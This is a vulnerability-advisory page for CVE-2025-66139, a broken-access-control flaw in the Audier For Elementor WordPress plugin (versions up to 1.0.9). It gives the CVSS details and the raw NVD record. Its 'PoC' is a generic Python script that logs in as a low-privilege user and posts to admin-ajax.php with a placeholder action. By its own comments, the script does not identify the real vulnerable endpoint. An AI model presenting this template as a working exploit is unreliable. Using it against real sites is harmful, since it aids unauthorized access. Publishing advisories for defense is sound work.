Security Vulnerability Report
中文
CVE-2025-66139 CVSS 5.4 MEDIUM

CVE-2025-66139

Published: 2026-01-22 17:16:01
Last Modified: 2026-04-27 18:16:38

Description

Missing Authorization vulnerability in merkulove Audier For Elementor audier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Audier For Elementor: from n/a through <= 1.0.9.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Audier For Elementor WordPress插件 <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-66139 PoC - Missing Authorization in Audier For Elementor # Target: WordPress site with Audier For Elementor plugin <= 1.0.9 target_url = "http://target-wordpress-site.com" # Step 1: Authenticate with low-privilege account login_url = f"{target_url}/wp-login.php" session = requests.Session() # Login with subscriber account login_data = { "log": "attacker_username", "pwd": "attacker_password", "wp-submit": "Log In" } response = session.post(login_url, data=login_data) # Step 2: Exploit the missing authorization vulnerability # Target the vulnerable AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Example exploitation - depends on specific vulnerable endpoint exploit_data = { "action": "audier_elementor_vulnerable_action", "nonce": "attacker_provided_or_empty", "post_id": "1" } response = session.post(ajax_url, data=exploit_data) print(f"Response Status: {response.status_code}") print(f"Response Content: {response.text}") # Note: Specific PoC requires enumeration of vulnerable endpoints # Check Patchstack database for exact vulnerable function

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66139", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:00.837", "lastModified": "2026-04-27T18:16:37.920", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Audier For Elementor audier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Audier For Elementor: from n/a through <= 1.0.9."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en merkulove Audier para Elementor audier-elementor permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Audier para Elementor: desde n/a hasta &lt;= 1.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/audier-elementor/vulnerability/wordpress-audier-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}